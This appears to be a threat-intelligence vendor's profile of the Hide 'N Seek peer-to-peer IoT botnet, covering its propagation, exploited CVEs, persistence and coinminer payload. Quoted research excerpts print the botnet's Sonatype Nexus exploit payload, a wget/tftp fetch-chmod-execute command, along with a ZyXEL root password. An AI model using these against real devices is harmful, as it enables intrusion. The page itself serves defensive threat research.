Hide 'N Seek, also known as HNS, is a peer-to-peer IoT botnet malware family first identified in 2018. It primarily targets Linux-based internet-exposed embedded devices such as routers, IP cameras, DVRs, and other IoT systems, and later expanded to attack server-hosted services and databases including CouchDB, OrientDB, ThinkPHP-based applications, and Sonatype Nexus Repository Manager. The malware is notable for using a decentralized peer-to-peer architecture rather than a traditional centralized command-and-control model, allowing infected nodes to exchange peer information, relay commands, distribute binaries, and support file transfer across the botnet.
Hide 'N Seek propagates through a combination of brute-forcing default or weak Telnet credentials and exploiting known remote code execution vulnerabilities in exposed devices and services. Reported targets have included equipment from TP-Link, Netgear, AVTECH, Cisco Linksys, Belkin, ZyXEL, and HomeMatic, as well as misconfigured or vulnerable database and application platforms. Variants have also targeted Android devices via Android Debug Bridge. The malware scans multiple service ports to locate candidates for compromise and contains embedded propagation logic, rather than relying solely on a separate loader component.
Functionally, Hide 'N Seek includes scanner and process-killer components and has shown code-level similarities to Mirai in some modules, particularly scanning and killing logic, while differing operationally through its custom P2P design and broader post-compromise behavior. Observed capabilities include remote code execution, exfiltration, interference with device operation, and termination of competing malware processes. Later variants added persistence mechanisms that allowed the malware to survive reboots on some infected Linux devices by installing startup entries, making it one of the earliest known IoT malware families with reboot persistence.
The botnet remained under active development after its discovery, with successive variants adding new exploits, expanding architecture support, and broadening target scope beyond embedded devices to cross-platform server software. Researchers also observed attempts to deploy a Monero cryptomining payload on some compromised systems, although mining activity appeared limited. Hide 'N Seek has been associated with opportunistic mass exploitation of poorly secured devices rather than narrowly focused sector-specific targeting, but affected systems have included products widely deployed across commercial and critical infrastructure environments.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
After logging in successfully via telnet into a ZyXEL PK5001Z modem, the third one (CVE-2016-10401) is used to escalate the user to root using ‘su’ with password ‘zyad5001’. | Interestingly, one of the families that showed up in our search was the Hide ‘N Seek (HNS) bot, which was discovered in January of 2018. HNS is a complex botnet that uses P2P to communicate with peers/other infected devices to receive commands.
In addition, this Hide 'N Seek variant also exploits the following vulnerabilities which it has used in the past: CVE-2018-7297: a RCE vulnerability in the HomeMatic Zentrale CCU2. | The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
CVE-2019-7238, which is a RCE vulnerability in Sonatype Nexus Repository Manager installations prior to version 3.15.0. While Proof of Concept (PoC) code for this vulnerability has been publicly available since a few weeks after its public disclosure, the only other instance of it being exploited in the wild has been by the DDG botnet in May 2019. Our research has shown, based on the first seen date for samples of this new Hide 'N Seek version, that the first demonstrated exploitation in the wild was actually February 2019, a full month prior to the DDG botnet. | The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
CVE-2018-20062, is an RCE vulnerability in ThinkPHP. This exploit has frequently been used by Mirai variants in the wild since its public disclosure, however this is the first observed use of it by Hide 'N Seek. | The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
19 distinct techniques documented for this family, organized by ATT&CK tactic.
If exploits fail, the scanner will try to brute force credentials with the help of its hard-coded dictionary with more than 250 entries, mostly containing default passwords for various devices.
CVE-2019-7238, which is a RCE vulnerability in Sonatype Nexus Repository Manager installations prior to version 3.15.0... The exploit format is shown below: POST /service/extdirect HTTP/1.1 ... 'java.lang.Runtime' ... '.getRuntime().exec(['flock'... '(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&./%N a%J a%J'
...'.getRuntime().exec(['flock','-w','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&./%N a%J a%J'...
According to Netlab researchers, the botnet is now capable of infecting the following types of devices, with the following types of exploits: TPLink-Routers RCE ... Netgear RCE ... AVTECH RCE ... CISCO Linksys Router RCE ... JAW/1.0 RCE ... OrientDB RCE ... CouchDB RCE
This is done by copying itself to /etc/init.d and also copying itself in newer versions to /etc/rc.d under a filename prefixed with S99
This is done by copying itself to /etc/init.d and also copying itself in newer versions to /etc/rc.d under a filename prefixed with S99
In addition to the two new exploits, this new variant also uses an XOR key of 0x87 for string encryption... the encryption scheme used is the same as has been used by the malware family so far i.e. a cumulative byte-wise XOR.
As a side-effect for adding more payloads, HNS is also noisier now, as it needs to scan more ports to find new hosts to infect. Experts say they've seen HNS bots initiating scans on ports: 23 Telnet 80 HTTP Web Service 2480 OrientDB 5984 CouchDB 8080 HTTP Web Service ... but also random ports
Netlab says HNS has also started dropping a coinminer payload on some of the infected systems. Fortunately, for the time being, it appears that these deployments have all failed, as the additional coinminer payload failed to start and generate funds for the HNS operators.
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An IoT botnet mentioned as historical background for prior targeting of Avtech cameras.
A P2P Linux botnet that evolved to add persistence, multiple RCE exploits, and Android targeting via ADB in order to infect a wider range of devices.
IoT botnet that infects devices via known exploits and default-credential brute forcing, uses a custom UDP-based P2P protocol for peer discovery and file distribution, adds persistence on infected devices, and has distributed a Monero miner.
IoT botnet using a P2P structure that infects routers, DVRs, and database applications such as OrientDB and CouchDB via remote code execution exploits; it was noted as capable of surviving device reboots and was observed testing a coinminer payload.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.